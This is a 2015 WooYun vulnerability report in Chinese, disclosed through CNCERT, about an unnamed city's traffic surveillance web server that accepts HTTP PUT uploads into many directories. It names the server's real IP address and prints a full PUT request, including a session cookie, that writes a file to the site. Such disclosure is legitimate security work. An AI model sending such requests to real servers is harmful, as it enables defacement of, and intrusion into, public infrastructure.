当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102963

漏洞标题:某城市交通监控系统-篡改站点

相关厂商:cncert国家互联网应急中心

漏洞作者: XXXQQ

提交时间:2015-03-24 18:12

修复时间:2015-05-09 10:06

公开时间:2015-05-09 10:06

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开

简要描述:

那个好多关注的如何控制一座城市的交通视频监控系统,刚公布围观一下

详细说明:

发现可以put上传篡改站点,一开始想复制包然后构造利用工具上传,不知道是构造的不对还是要登录反正就是没成功,后来就想要把扫描工具发送的测试包先修改再通过通过代理发送出去,通过修改包的内容的就可以判断确实可以自定义包的内容
基本上刚一开始都是这几种没用的
60.191.106.46

1.png


2.png


3.png


我点了快半个小时了才出来一个put,这种方法有点逗b了...
长成这样的

4.png


路径和内容都可以自己修改
看看在不在

5.png


6.png


可能有几个上传的测试文件,麻烦多找下删掉吧
权限控制不严,好多目录都可以上传
比如

/common
/common/js
/common/js/locale
/common/jsp
/lib/jquery
/lib/
/lib/jqueryui/js
/skin
......


具体的没一一测试
后来测试好像只要复制包的内容就可以写进去

7.png


8.png


PUT /test2.txt HTTP/1.1
Content-Length: 20
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://60.191.106.46/index.jsp
Host: 60.191.106.46
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=E57D3733867D9E5AB2848E5306663BF9
zhen de ke yi xie!!!


好像还有几个漏洞,不太会利用,主要是一访问就跳转,大牛可以试下

漏洞证明:

11.png


8.png

修复方案:

修复吧

版权声明:转载请注明来源 XXXQQ@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-25 10:04

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。

最新状态:

暂无